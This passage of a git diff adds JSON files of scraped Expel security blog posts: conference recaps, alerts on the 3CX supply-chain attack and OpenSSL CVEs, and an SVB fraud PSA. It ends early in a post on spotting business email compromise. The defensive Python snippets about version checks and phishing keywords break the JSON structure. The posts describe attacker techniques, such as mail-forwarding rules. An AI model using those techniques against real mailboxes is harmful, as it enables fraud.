+1,6 @@ +{ + "title": "RSA Conference keynote kickoff: what it means to be \u201c ...", + "url": "https://expel.com/blog/rsa-conference-keynote-kickoff-what-it-means-to-be-stronger-together/", + "date": "Apr 25, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference keynote kickoff: what it means to be \u201cStronger Together\u201d Expel insider \u00b7 2 MIN READ \u00b7 ANDY RODGER \u00b7 APR 25, 2023 \u00b7 TAGS: Company news Perhaps more than any other industry, the world of cybersecurity requires community . Much ink (real and digital) has been spilled on this notion since the dawn of the space, as companies and individuals realized early on they\u2019d need to take special care to protect their vital assets in the cyber realm. Fighting cybercriminals takes everyone\u2013defenders, leaders, vendors, partners, competitors, frenemies, rivals, and, well, everybody \u2013coming together to combat those that mean us harm, whether it\u2019s for financial gain, IP theft, espionage, sowing chaos, or just for mischief. This community convenes this week in San Francisco for RSA Conference 2023 , and it\u2019s events like these that demonstrate the strength of this community. It\u2019s here that we share what we\u2019ve learned about the trends, technologies, and techniques that had the greatest impact in the previous year, as well as what\u2019s poised to affect us most in the year ahead. 
The \u201cStronger Together\u201d theme of this year\u2019s conference is front-and-center. But the mission runs much deeper than the signs around the Moscone Center and the slide decks on stage\u2014it\u2019s evident in the programming, too. The agenda features a wide range of technical sessions\u2014of course\u2014but it also features sessions on diversity and growing the cybersecurity workforce, both in size and experience. It includes the latest on perennial favorites like hacking tactics and incident response, as well as emerging ones, like the potential impact of artificial intelligence (AI) for criminals and defenders alike. So when the lights dimmed and the music started to introduce the keynote, it wasn\u2019t surprising to hear a voiceover reminding us that, \u201cWe are more than an industry. We are a community. No matter where you are in the world, we\u2019re always here to welcome you home.\u201d This theme was also reflected in the opening to the keynote, delivered by Saturday Night Live legend and Portlandia star, Fred Armisen. He got the crowd laughing and heads bopping with his take on guitar music genres and lyrical styles from the \u201960s through the early 2000s. But when he got the crowd to its feet to sing along to \u201cAll You Need Is Love\u201d by The Beatles, the idea of being \u201cstronger together\u201d really started to coalesce. Following Fred Armisen is no easy feat, but RSA Conference program committee chair Hugh Thompson delivered. He reminded the crowd that this event is about the fellowship among others that face the same challenges, and we\u2019re all here to build bridges and connections. He reminded us that when we chose a career in cybersecurity, we also committed to being life-long learners. Our adversaries are just as creative, smart, and well-resourced as we are, so we must constantly learn to stay ahead. This challenge is particularly important in the field of science and technology. Thompson very aptly noted that when advancements emerge, they shine a bright light. This light represents an opportunity, but it also casts a shadow in which our adversaries operate. But that\u2019s okay. We\u2019re shadow experts. We know where to look, where to shine more light, and how to expose attackers and their tactics. Thompson only held the stage for a few brief minutes, but his message was clear: we\u2019re a community, and together we\u2019ll emerge victorious. If you\u2019re interested in learning about Expel\u2019s role in the cybersecurity community, visit us in the South Hall of the Moscone Center, booth 0954. And be sure to follow us on LinkedIn and Twitter , where we\u2019re posting frequent updates about our booth happenings and what we\u2019re hearing in sessions." +} \ No newline at end of file diff --git a/rsa-conference-returns-day-1-keynote-summary.json b/rsa-conference-returns-day-1-keynote-summary.json new file mode 100644 index 0000000000000000000000000000000000000000..160d0e7f746ef51adc747f6941211b2ebc6bbed7 --- /dev/null +++ b/rsa-conference-returns-day-1-keynote-summary.json @@ -0,0 +1,6 @@ +{ + "title": "RSA Conference Returns: Day 1 Keynote Summary", + "url": "https://expel.com/blog/rsa-conference-returns-day-1-keynote-summary/", + "date": "Jun 7, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference Returns: Day 1 Keynote Summary Expel insider \u00b7 3 MIN READ \u00b7 ANDY RODGER \u00b7 JUN 7, 2022 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools The moment we\u2019ve been waiting for is here! 
RSA Conference is back, live and in-person. While you can correctly point out that the conference never really went away\u2014it was a virtual event in 2021\u2014many folks in our industry would agree that it just wasn\u2019t the same. Albeit with smaller crowds than pre-pandemic years and four months later than originally scheduled, it\u2019s great to be back and the energy is high. RSA picked \u201cTransform\u201d as its theme for this year\u2019s event. It\u2019s rather apropos considering the state of our industry, our workforce, security technologies, the threat landscape, and the very nature of this event. It seems that every year represents a \u201cturning point\u201d for the world of cybersecurity, and 2022 is no different. The keynote speakers who kicked off the 2022 event were all inspiring and hopeful for the future of the security space. But before they came out, the crowd was treated to a special performance\u2026 You know something special is about to happen when a beatboxer kicks off a conference. And when that beatboxer is followed by the rest of her group, Freestyle Love Supreme , the energy gets amped way up! Side bar: If you missed out on the keynote (or you just can\u2019t get enough), we\u2019re hosting freestyle rapper and YouTube sensation, Harry Mack , at our booth (S649) on Tuesday, June 7, at 11 am, 2 pm, and 5 pm PT. (Great minds think alike, @RSAC!) Rohit Ghai, the CEO of RSA, bravely took the stage following the special act for the opening keynote. His address, titled, \u201cThe Only Constant,\u201d examined the cybersecurity industry\u2019s experience in shaping transformational shifts that will determine the \u201cnext\u201d normal. He discussed how the world has been living with disruption, like the pandemic and the conflict in Ukraine, and explored how physical disruption can create digital ripples\u2014and vice versa. (We all remember how the Colonial Pipeline cyberattack resulted in long lines at the gas pump.) According to Ghai, the Ukrainian hacker army is three times the size of Ukraine\u2019s actual military force. Ghai pointed out that we are moving towards a more hyperconnected world where the physical and digital realms are indistinguishable, and where we\u2019re going to need to know how to deal with a torrent of global disruptions. He ended his address on an encouraging note, stating, \u201cThis is our story. Let\u2019s not allow anyone else to write it.\u201d Cisco\u2019s EVP and GM of security and collaboration, Jeetu Patel, and SVP and GM of Cisco\u2019s security business group, Shailaja Shankar, took to the stage next to ask, \u201cWhat Do We Owe One Another in the Cybersecurity Ecosystem?\u201d Patel outlined three trends that Cisco is hearing from their 300,000+ customers: Businesses are competing as ecosystems, rather than as individual entities, Everyone is an insider, and can be considered a potential threat, and Hybrid work is here to stay. Patel believes that security resilience is the key for organizations faced with these significant cybersecurity challenges. Shankar then described an issue that compounds these potential threats; a concept she\u2019s termed the \u201cSecurity Poverty Line.\u201d This is the baseline security posture companies need to deal with cyber threats. 
Getting companies above this poverty line, Shankar argued, requires more than information sharing and volunteering to help smaller or struggling organizations\u2014it means truly investing in their security capabilities and even sharing the security risk they might encounter. Tom Gillis, VMware\u2019s SVP and GM of networking and advanced security business group, took to the stage next to reframe our thinking away from separating on-premises, private cloud security from public cloud security. He instead advocated for separating security between traditional virtualized applications and Kubernetes applications. It was an interesting shift in perspective on the usual borders that separate security strategies. Lastly, the microphone passed to Michele Flournoy, the co-founder and managing partner of WestExec Advisors and Avril Haines, the director of national intelligence, and the first woman to hold the job. The conversation tackled \u201cRethinking the Cybersecurity Challenge From an Intelligence Community (IC) Perspective,\u201d and how the intelligence community is collaborating with industry and international partners to rethink how we design networks, and the cybersecurity that protects them. One common thread across the keynote speakers was a hopeful, uplifting, and encouraging tone. Too often in our industry, companies use fear, uncertainty, and doubt to get their points across and compel action. Today, the keynotes centered on how we, as an industry, can pull together to change the world for the better. We\u2019ll be on the showfloor at booth S649 in the South Hall all week! Stop by to say hi, book a meeting or schedule a demo , and keep an eye out for more daily recaps of our time at Moscone\u2014just like this one." +} \ No newline at end of file diff --git a/rsac-round-2-expel-heads-back-to-moscone-expel.json b/rsac-round-2-expel-heads-back-to-moscone-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..794bae46e88bccb378c95b8209633def61d8ae0c --- /dev/null +++ b/rsac-round-2-expel-heads-back-to-moscone-expel.json @@ -0,0 +1,6 @@ +{ + "title": "#RSAC round 2: Expel heads back to Moscone - Expel", + "url": "https://expel.com/blog/rsac-round-2-expel-heads-back-to-moscone/", + "date": "Apr 18, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG #RSAC round 2: Expel heads back to Moscone Expel insider \u00b7 1 MIN READ \u00b7 KELLY FIEDLER \u00b7 APR 18, 2023 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools Our bags are packed and we\u2019re counting down as we prep to make our second appearance at RSA Conference (#RSAC) as exhibitors. We made a lot of noise last year\u2014throwback to when YouTube sensation Harry Mack freestyled from our booth on the show floor\u2014and we can\u2019t wait to return to Moscone. We\u2019re especially excited because this year\u2019s theme of \u2018stronger together\u2019 really hits home for us at Expel. We know we\u2019re strongest when we come together as a defender community to share knowledge and lessons learned. We can\u2019t wait to talk shop with our peers, trade stories from the security operations center (SOC), and show you security that makes sense. Recent headlines (think: Silicon Valley Bank and the 3CXDesktopApp supply chain attack ) are only proof points of the increasingly complex threat landscape, meaning security teams need visibility across the cloud, Kubernetes, SaaS apps, and on-prem to keep up. 
Stop by our booth (S0954 in the South Hall) to see how we translate alerts into prescriptive outcomes with a software-driven approach to security operations. Fueled by our security operations platform, Expel Workbench\u2122, we\u2019ll show you how our managed security products leverage the tech you already have in place to make sure you\u2019re getting the most out of your existing investments. Our goal is to help customers evolve from reactive security strategies to ones that are proactive, measurable and resilient, with managed detection and response (MDR), threat hunting, phishing, and more. By the way, remember that \u2018stronger together\u2019 theme? San Francisco-based artist, Bee Betwee will join us onsite to create an art installation of the many faces, backgrounds, and experiences that represent cybersecurity\u2014live from the show floor. Head to the Expel booth on Tuesday, April 25, and Wednesday, April 26, 2-5pm, and Thursday, April 27, 10am-1pm, to watch Bee work and for the chance to become a part of the art. Want to see for yourself and meet our crew? Book a demo here to see Expel Workbench in action at the booth. We also know the exhibit hall can be loud. Schedule a one-on-one meeting right down the block at Aphotic here (just a six-minute walk from Moscone)." +} \ No newline at end of file diff --git a/security-alert-3cxdesktopapp-supply-chain-attack-expel.json b/security-alert-3cxdesktopapp-supply-chain-attack-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..9411759ec9d1b9fd42114d948c65f8dad2ef1d66 --- /dev/null +++ b/security-alert-3cxdesktopapp-supply-chain-attack-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Security alert: 3CXDesktopApp supply chain attack - Expel", + "url": "https://expel.com/blog/security-alert-3cxdesktopapp-supply-chain-attack/", + "date": "Mar 30, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Security alert: 3CXDesktopApp supply chain attack Security operations \u00b7 2 MIN READ \u00b7 JON HENCINSKI \u00b7 MAR 30, 2023 \u00b7 TAGS: MDR What happened? The popular voice and video conference software, 3CXDesktopApp by 3CX, was recently compromised in an apparent supply chain attack. Attackers have trojanized 3CX installers to turn them into malicious tools used in multi-stage attacks. Starting March 22, 2023, global 3CX users began reporting endpoint detection and response (EDR) quarantining of the 3CXDesktopApp for suspicious behavior. On March 29, CrowdStrike confirmed and published a report that both the Windows and MacOS versions of the application had been compromised in a supply chain attack. According to 3CX, the following versions of 3CXDesktopApp are compromised: Windows versions 18.12.407 and 18.12.416 Mac OS versions 18.11.1213, 18.12.402, 18.12.407, and 18.12.416. Why does it matter? 3CX serves more than 600,000 companies worldwide and has over 12 million daily users. Given the vast interconnectedness of the contemporary cyber landscape, the ripple from supply chain attacks like this one creates risk exposure for a massive number of organizations. What\u2019re we doing for our customers? First, we\u2019re reviewing customer logs for evidence of attempted or successful compromise. We\u2019ve also deployed global Be-on-the-Lookout (BOLO) rules to alert when we ingest any security telemetry that contains domains or known bad hashes linked to the attack. Finally, we\u2019ve reviewed all ingested alert signals going back 30 days. 
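(If you want to run the same kind of check on your side, a quick first pass at "are we impacted?" can be as simple as comparing an inventory export against the version list above. Here's a minimal Python sketch — the inventory rows and field layout are hypothetical stand-ins for whatever your asset-management or EDR tooling can export; only the compromised version numbers come from 3CX's advisory.)

```python
# Minimal triage sketch: flag hosts running a 3CXDesktopApp build that 3CX
# lists as compromised. The inventory below is a placeholder for whatever
# your asset-management or EDR tooling can export (hostname, OS, version).
COMPROMISED = {
    "windows": {"18.12.407", "18.12.416"},
    "macos": {"18.11.1213", "18.12.402", "18.12.407", "18.12.416"},
}

inventory = [
    # (hostname, os, 3CXDesktopApp version) -- example rows, not real data
    ("finance-laptop-01", "windows", "18.12.416"),
    ("helpdesk-mac-03", "macos", "18.12.300"),
]

def flag_compromised(rows):
    """Yield rows whose 3CXDesktopApp version is on the compromised list."""
    for hostname, os_name, version in rows:
        if version in COMPROMISED.get(os_name.lower(), set()):
            yield hostname, os_name, version

for host, os_name, version in flag_compromised(inventory):
    print(f"PATCH/ISOLATE: {host} runs compromised 3CXDesktopApp {version} ({os_name})")
```

It's deliberately simple — the point is that an accurate asset inventory turns "are we impacted?" into a five-minute question instead of a fire drill.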
As we begin to observe vendor-written detections for this activity, we\u2019ll evaluate these as part of Expel\u2019s detection methodology. We\u2019re also monitoring open source channels for updates. What should you do right now? If you\u2019re using the 3CXDesktopApp application, follow 3CX guidelines by utilizing the web application PWA instead of the desktop application. Next, implement the applicable patches and updates when appropriate and able. 3CX reports that the majority of the domains contacted by the compromised library have already been reported and taken down. However, we still recommend proactively blocking all known IOCs, check out this SecurityWeek article for reference. What can you do longer term? Plan for supply chain attacks\u2014The term \u201csupply chain\u201d can mean different things to different organizations. For many tech companies, your supply chain is a long list of cloud services that facilitate your day-to-day business. Assume attackers target you and plan accordingly. Have plans for alternative supply chain providers\u2014We\u2019re not saying you need a hot backup for all your cloud services, but it\u2019s smart to have a contingency for potentially rapid provider shifts in the event of a catastrophic hack. This should be largely in line with your business continuity plans (which you\u2019ve tested, right?). Prioritize asset management\u2014When you learn about a compromised major vendor or software repository, you must be able to answer, \u201cAre we impacted?\u201d quickly and accurately. Be creative\u2014Failures of imagination are a real (and really unfortunate) thing. And it can be very difficult to dream up attacks like SolarWinds Orion or vulnerabilities like Heartbleed. When planning tabletops, ask people around your company: \u201cWhat\u2019s the worst thing that could happen?\u201d You might be surprised at the scenarios others are worrying about. What next? As we outlined, we\u2019re keeping a close eye on this situation as it unfolds. We\u2019ll update this post with big developments, but keep an eye on our socials ( @ExpelSecurity ) for additional recommendations as they emerge." +} \ No newline at end of file diff --git a/security-alert-high-severity-vulnerability-affecting-openssl.json b/security-alert-high-severity-vulnerability-affecting-openssl.json new file mode 100644 index 0000000000000000000000000000000000000000..d5aaddfb05d20479820e81086222fe724dc53767 --- /dev/null +++ b/security-alert-high-severity-vulnerability-affecting-openssl.json @@ -0,0 +1,6 @@ +{ + "title": "Security alert: high-severity vulnerability affecting OpenSSL ...", + "url": "https://expel.com/blog/security-alert-high-severity-vulnerability-affecting-openssl-v3-and-higher/", + "date": "Nov 3, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Security alert: high-severity vulnerability affecting OpenSSL V3 and higher Security operations \u00b7 2 MIN READ \u00b7 AARON WALTON AND JAMES MASKELONY \u00b7 NOV 3, 2022 \u00b7 TAGS: MDR CVE-2022-3602 & CVE-2022-3786: software that uses OpenSSL 3.0.0-3.0.6 should still be upgraded to 3.0.7 as soon as it is reasonable to do so. What happened? On November 1, 2022, the OpenSSL Project released version 3.0.7 to address two vulnerabilities affecting OpenSSL version 3.0 and later that they classify as high-severity. 
CVE-2022-3602: \u201cX.509 Email Address 4-byte Buffer Overflow\u201d CVE-2022-3786: \u201cX.509 Email Address Variable Length Buffer Overflow\u201d OpenSSL originally categorized these vulnerabilities as \u201ccritical\u201d severity before disclosing them , but they have now downgraded them after determining they\u2019re less dangerous than initially thought. Why does it matter? OpenSSL is a widely used open-source encryption library. Its widespread adoption contributed to increased initial concern, as any critical exploit could potentially affect a large number of systems (think Heartbleed level of disruption). However, later information revealed that the affected versions (3.0.0-3.0.6) are relatively new and not as widely adopted as first thought. (When considering severity, it\u2019s important to note that the definitions of \u201ccritical\u201d and \u201chigh\u201d used by OpenSSL are their own and don\u2019t follow standard categorizations such as the Common Vulnerability Scoring System [CVSS]. These factors are important when calculating the possible impact.) While CVE-2022-3602 could potentially lead to Remote Code Execution (RCE), the good news is there are several mitigating factors that make successful code execution fairly unlikely on affected systems. According to the OpenSSL notification , exploitation requires either that the attacker have a certificate signed by a trusted Certificate Authority (CA), or that the application would need to ignore certificate verification failures. While this isn\u2019t impossible for attackers, it means the attack takes a lot more work than we first anticipated. On top of that, most systems have a variety of existing security protections against memory attacks. These protections add a layer of complexity to achieving code execution via buffer overflow. The added constraint of only four attacker-controlled bytes further complicates any attack path. Abusing this vulnerability for RCE would require significant development and creation of a complex exploit chain. The second vulnerability, CVE-2022-3786, also abuses a basic buffer overflow and could be used to cause a denial of service (DoS) and prevent use of the software. Some attackers use DoS in attacks, but such attacks typically don\u2019t earn cash and aren\u2019t as interesting and desirable. That doesn\u2019t mean attackers couldn\u2019t use it, but financially motivated attackers are less likely to rush to do so. What you should do While no longer critical, the OpenSSL team still considers these issues to be serious, and software that uses OpenSSL 3.0.0-3.0.6 should still be updated to 3.0.7 as soon as is reasonable. If you have further questions about this vulnerability or any other threat to your cybersecurity environment, please contact us. Sidebar: this event serves as a great reminder that patching and updating software regularly can help prevent attacks. It might seem obvious to security professionals, but vendors are constantly plugging security holes and patching bugs. Ignoring upgrade notifications might be convenient now, but it could cost organizations down the line." 
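Patching starts with knowing which OpenSSL your software is actually linked against — and that isn't always the copy your package manager reports. As one small illustration (not an exhaustive audit; statically linked or bundled copies of the library won't show up this way), here's a Python sketch that reports the OpenSSL build the interpreter's ssl module was compiled against and flags the affected 3.0.0–3.0.6 range.

```python
import re
import ssl

# The ssl module exposes the OpenSSL build CPython was linked against,
# e.g. "OpenSSL 3.0.2 15 Mar 2022". This covers only this one runtime --
# other software on the host may bundle its own copy of the library.
version_string = ssl.OPENSSL_VERSION
match = re.search(r"OpenSSL (\d+)\.(\d+)\.(\d+)", version_string)

if not match:
    print(f"Could not parse an OpenSSL version from: {version_string!r}")
else:
    major, minor, patch = (int(x) for x in match.groups())
    print(f"Linked against: {version_string}")
    if (major, minor) == (3, 0) and patch <= 6:
        print("Affected by CVE-2022-3602 / CVE-2022-3786 -- upgrade to 3.0.7.")
    elif major >= 3:
        print("OpenSSL 3.x at or above 3.0.7 -- not affected by these two CVEs.")
    else:
        print("OpenSSL 1.x or older -- not affected by these two CVEs (but keep patching).")
```

Run the same kind of inventory check for every runtime and appliance that ships its own OpenSSL, since those are the copies that tend to linger unpatched.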
+} \ No newline at end of file diff --git a/security-for-the-other-99-percent-expel.json b/security-for-the-other-99-percent-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..87d75e1510f817cf412b94f54f29499fe43337b8 --- /dev/null +++ b/security-for-the-other-99-percent-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Security for the other 99 percent - Expel", + "url": "https://expel.com/blog/security-for-the-other-99-percent/", + "date": "Apr 10, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Security for the other 99 percent Expel insider \u00b7 3 MIN READ \u00b7 DAVE MERKEL \u00b7 APR 10, 2018 \u00b7 TAGS: Announcement / Company news / Mission Every time I read the words \u201cRedThreatStormDoom, the market leading provider of cybersecurity next-gen whatnots, announced it has secured seventy-flabillion dollars in series Q financing \u2026\u201d I jump for joy. The thought of more widgets for massive security organizations that can create yet more categories of spend in their ever expanding budgets warms the cockles of my heart (which are technically the ventricles). OK, no, it actually doesn\u2019t warm anything. I sort of sigh in exasperation. Y\u2019see, while there is great innovation coming from entrepreneurs, it\u2019s frequently focused on solving problems for elite security organizations \u2013 or at the very least elite security spenders. Security \u201cone-percenters,\u201d if you will. Maybe that\u2019s too cynical. But the reality is that much of the innovation coming out of security vendors today can only be effectively employed by security one-percenters, regardless of how much the vendor thinks everyone should (or can) use their product. Why is that? Two primary reasons: budget realities and people. First, security budgets are finite . Unless you\u2019re a top-tier bank it\u2019s unlikely your spend is increasing every year. You probably don\u2019t buy one of everything. And even if you do, it\u2019s highly unlikely you\u2019ve got the people you\u2019d need to get the value out of all those widgets. People are expensive \u2013 whether you\u2019re talking salaries or the opportunity cost of keeping them happy or dealing with the times you fail to keep them happy. And if you\u2019re looking to have 24\u00d77 operations you can multiply that expense yet again. \u201cBut what about the AIs?\u201d you might ask. \u201cAren\u2019t they supposed to get those pesky humans out of the loop?\u201d Well sure \u2026 but only if you embed them in a blockchain. And name your company blockchain.ai. THEN you might be on to something. (How sad is it that I just typed \u201cblockchain.ai\u201d into my browser to make sure it wasn\u2019t a thing because in this day and age you can\u2019t be sure?). OK, fine, let\u2019s actually deal with that. What about the AIs? A variety of advances in computer science, including AI, machine learning techniques, etc., can help us. But it\u2019s not going to eliminate people any time soon. Improvements that come from the AIs and MLs will increasingly augment the human decision maker. Ergo, my prior comments regarding one-percenters and the expense of keeping the brains in the loop happy. 
With that overlong preamble, I\u2019m pleased to announce Expel, the nowhere-near-market-leading (yet \u2026 because we\u2019re a 20 month old start-up) provider of transparent managed security has secured $20 million in series B financing, led by Scale Venture Partners, and joined by all of our existing (and fantastic) supporters at Battery Ventures, Greycroft, Lightbank, NEA, Paladin Capital Group and Profile Capital Management. Why am I pleased? Because increasingly we\u2019re finding people of like mind that agree with our view of the world: the biggest gap in the information security market isn\u2019t a lack of interesting, innovative technology to generate security signal in your (endpoint, network, cloud) infrastructure. It\u2019s an inability to turn that into something you can action at a realistic, predictable cost. Hiring your way out of the problem isn\u2019t going to work for most organizations, and you can\u2019t buy a magic AI-in-a-box to make the problem go away. So what are the other 99 percent supposed to do? The logical answer is \u201cgo get yourself a managed security service provider (MSSP).\u201d But we think that market\u2019s in flux . On one hand you have the legacy MSSP providers, long in the tooth, mired in old technologies and processes, slogging through alerts with hordes of analysts stacked up like a cord of wood in a SOC. On the other hand, you\u2019ve got niche managed offerings \u2013 often referred to as managed detection and response (MDR) \u2013 focused on specific managed security use cases and technologies. While some of these solutions provide value, they still operate as a black box. It\u2019s hard to know what\u2019s happening behind the curtain (in their SOC). Nobody is going after the whole solution and no one is using your existing security investments to provide a transparent managed offering that delivers answers \u2026 not just alerts. Here at Expel we\u2019re trying to fix that. And this new investment will help us do it a bit faster. Now, in the spirit of ending with an \u201cexecutable\u201d \u2013 something you can go away and do without writing a check \u2013 take a look at this post from our CISO , Bruce Potter (we say it \u201cSEE-so,\u201d mostly to annoy Bruce). It shows how you can use the NIST Cybersecurity Framework to evaluate and visualize where you\u2019re at and where you want your security program to go. It includes some tips and a self-scoring Excel spreadsheet that lets you use the NIST CSF in a common sense way. It also speaks to what Expel provides in a CSF context. If you\u2019re thinking to yourself \u201cthat\u2019s nice you got funding and all, but what specific impact will you have on my environment\u201d this provides the answer." 
+} \ No newline at end of file diff --git a/security-psa-svb-collapse-presents-ripe-opportunity-for.json b/security-psa-svb-collapse-presents-ripe-opportunity-for.json new file mode 100644 index 0000000000000000000000000000000000000000..2e9a4254cd8eef977807de3417a2615950ae81c7 --- /dev/null +++ b/security-psa-svb-collapse-presents-ripe-opportunity-for.json @@ -0,0 +1,6 @@ +{ + "title": "Security PSA: SVB collapse presents ripe opportunity for ...", + "url": "https://expel.com/blog/security-psa-svb-collapse-presents-ripe-opportunity-for-counterparty-fraud/", + "date": "Mar 16, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Security PSA: SVB collapse presents ripe opportunity for counterparty fraud Security operations \u00b7 2 MIN READ \u00b7 GREG NOTCH \u00b7 MAR 13, 2023 \u00b7 TAGS: MDR Blog updated on March 16 What happened? Following the collapse of Silicon Valley Bank (SVB) and the resulting uncertainty throughout the banking sector, many vendors and suppliers will be updating their banking information. Accounts receivable (AR) departments will reach out to accounts payable (AP) departments with new routing and account numbers at a much higher volume than usual. Why does it matter? An increased volume of bank account switching presents a massive opportunity for payment counterparty fraud. If an attacker is able to deceive someone into altering a few account and routing numbers, they can direct money to themselves, rather than your vendor or into your own accounts. Often this begins with compromised or forged emails resulting from business email compromise (BEC). Depending on the size of your environment, this may go unnoticed for some time. By the time you detect the attack, you could be out a significant amount of money\u2014and you\u2019ll still owe your vendor. What\u2019re we doing? At this time, we\u2019ve begun to see SVB-themed phishing submissions. Expel has created several YARA detections to identify phishing attacks affiliated with SVB and is assessing new detections for both our phishing and managed detection and response (MDR) offerings. What should you do right now? Validate account changes with known contacts at the counterparty where possible. Don\u2019t do this via email if it can be avoided (in case either your email or the other party\u2019s is compromised). Confirm receipt of a test deposit of a nominal value prior to making a bank account change for your vendor. This takes a bit more effort, but there\u2019s little doubt fraudsters will try to take advantage of the turmoil. What can you do longer term? BEC isn\u2019t new. It accounted for over half of all cyber incidents last year (according to our annual threat report ), and remains the top threat facing our customers. We also saw threat actors targeting human capital management systems\u2014specifically, Workday\u2014with the goal of payroll and direct deposit fraud. Situations like what\u2019s happening with SVB only exacerbate the opportunity for bad actors to exploit people as they scramble to ensure their finances are protected\u2014and prevention starts with proper training. Make sure employees are trained to recognize potential red flags associated with phishing emails. Spend time educating specific business units about the phishing campaigns that might target them. In this example, finance teams might encounter financial-themed campaigns with subject lines such as \u201cURGENT:INVOICES\u201d or \u201cbank change\u201d (and they may even reference SVB directly). 
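To make the lure themes concrete, here's a rough Python sketch of a subject-line triage filter built around the examples above. The example subjects are made up, and keyword matching on its own is nowhere near real phishing detection (sender, headers, links, and attachments all matter) — treat it as an illustration of what to teach finance teams to notice, not as detection content.

```python
import re

# Illustrative only: crude subject-line triage for the SVB-themed lures
# described above. The subjects below are invented examples.
THEME_PATTERNS = [
    r"\burgent\b.*\binvoice",                      # e.g. "URGENT:INVOICES"
    r"\bbank(ing)?\s+(change|update|details)\b",   # e.g. "bank change"
    r"\b(svb|silicon valley bank)\b",
]

def looks_svb_themed(subject: str) -> bool:
    """Return True if a subject line matches any of the lure themes above."""
    s = subject.lower()
    return any(re.search(pattern, s) for pattern in THEME_PATTERNS)

example_subjects = [
    "URGENT:INVOICES - action required before EOD",   # made-up example
    "Updated banking details following SVB closure",  # made-up example
    "Lunch on Thursday?",
]

for subject in example_subjects:
    flag = "REVIEW" if looks_svb_themed(subject) else "ok"
    print(f"[{flag}] {subject}")
```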
Once employees know what to look for, make it easy for them to report any suspicious activity. We recommend implementing a system for employees to validate suspicious emails or texts, allowing IT to provide guidance to the individual and giving security teams enough insight to identify trends that might indicate a larger scale attack early on. These trainings can mean an investment up-front, but they\u2019ll pay dividends in the long run. What next? With the collapse of SVB, there\u2019s always the potential for further turmoil within the banking industry (we also saw the shuttering of Signature Bank over the weekend). As these events unfold, we\u2019ll continue working with our customers to help protect them from bad actors looking to exploit the situation. By the way, not an Expel phishing customer and think you\u2019d like to be? Reach out ." +} \ No newline at end of file diff --git a/signs-of-business-email-compromise-bec-phishing.json b/signs-of-business-email-compromise-bec-phishing.json new file mode 100644 index 0000000000000000000000000000000000000000..bc6b7182f73b0fef6a512d632b88dc7af89ac3e0 --- /dev/null +++ b/signs-of-business-email-compromise-bec-phishing.json @@ -0,0 +1,6 @@ +{ + "title": "Signs of Business Email Compromise (BEC) Phishing ...", + "url": "https://expel.com/blog/seven-ways-to-spot-business-email-compromise-office-365/", + "date": "Feb 14, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Seven ways to spot a business email compromise in Office 365 Tips \u00b7 10 MIN READ \u00b7 JON HENCINSKI \u00b7 FEB 14, 2019 \u00b7 TAGS: Cloud security / Get technical / How to / Managed security / SOC Remember the old days when all of those Nigerian princes were emailing you to offer giant sums of money? All you\u2019d need to do, of course, was click that suspicious-looking link, share your bank account information and you\u2019d be living large. (Finally, a good reason to stop buying all those Powerball tickets.) That scam is the old school version of a type of attack called a business email compromise (BEC). While those generous Nigerian princes have long since vanished, BEC has gotten far more sophisticated over the years, turning even the savviest internet users into unwitting victims. As attackers behind BEC attacks find ever more clever tactics to use, it\u2019s getting trickier for businesses to protect themselves. But there are some telltale signs you can look for that are tip-offs that something\u2019s amiss. What is business email compromise (BEC)? First things first, though. You\u2019ve got to know what you\u2019re looking for. Business email compromise (BEC) is a sophisticated, email-based scam targeting organizations and individuals just about everywhere. Many people think that BEC is only associated with wire transfer fraud, but the reality is that BEC is much more than that . It\u2019s really an umbrella term that includes things like W2 scams , romance scams , real estate scams and lottery scams . You\u2019re probably sitting there thinking, \u201cDo people really fall for these tricks?\u201d They sure do. And it happens more often than you think. In fact, between October 2013 and May 2018 , there were 78,617 domestic and international BEC incidents, with victims from over 150 countries and all 50 U.S. states. BEC fraud has become so widespread that it\u2019s now the target of major international law enforcement efforts coordinated domestically and abroad by organizations like the FBI and U.S. Department of Justice. 
Just this past summer, a BEC takedown effort named Operation WireWire resulted in 74 arrests globally, including 42 in the U.S. They nabbed nearly $2.4 million and recovered approximately $14 million in fraudulent wire transfers. Now for the good news: There are ways that you can spot BEC attacks and stop them before they compromise unsuspecting employees. Three common categories of BEC scams 1. CEO Impersonation During a CEO fraud scam, the hacker will impersonate the CEO or another executive at the org in an attempt to trick any level of employee to divulge private information. These requests can range from sending confidential client information or tax information via email to executing wire transfers that are not authorized. In some cases, these schemes can be spear-phishing attacks where an employee is convinced to download a file or software onto a work computer. 2. Full Account Takeover One of the biggest goals for a cyberattacker is full takeover. This category of BEC scams can be the most devastating. Interestingly, a report from IDG Communications found that more than 56 percent of orgs reported falling victim to a breach caused by their vendor. 3. False Invoice Scheme False invoice schemes typically target a member of the financial or accounting department. More experienced cyberattackers will alter a legitimate invoice\u2019s bank account numbers but leave the rest of the document unchanged, making it very challenging to notice the invoice is fake. From there, the possibilities are endless. Some attackers increase the payment amount or create a double payment, among many other common hacking techniques. How to spot (and alert on) BEC activity Through the Expel SOC\u2019s investigate work responding to many BEC activities in Office 365 (O365), we\u2019ve observed threat actors reusing certain techniques to gain and maintain access to victims\u2019 mailboxes. Take a look at this example of a recent investigation where a threat actor used BEC to access a victim\u2019s mailbox and then set up mailbox Inbox rules to redirect any emails that contained the words \u201cstatement,\u201d \u201coutstanding,\u201d \u201cpastdue,\u201d \u201cpayment,\u201d \u201cinvoice\u201d or \u201cwire\u201d to a Gmail account. Here are some common hallmarks of crafty BEC attacks, that our own SOC analysts here at Expel have detected in the last few months by using the Expel Workbench. We\u2019re going to share some of the techniques that we see attackers using again and again so you can take steps to protect your own org. As a bonus, we\u2019ll even share log samples and example SIEM queries (we\u2019re using Sumo Logic ) if you want to query your own tools for related activity. Plus we\u2019re sharing our perspective on how likely you are to get false positives from these rules. 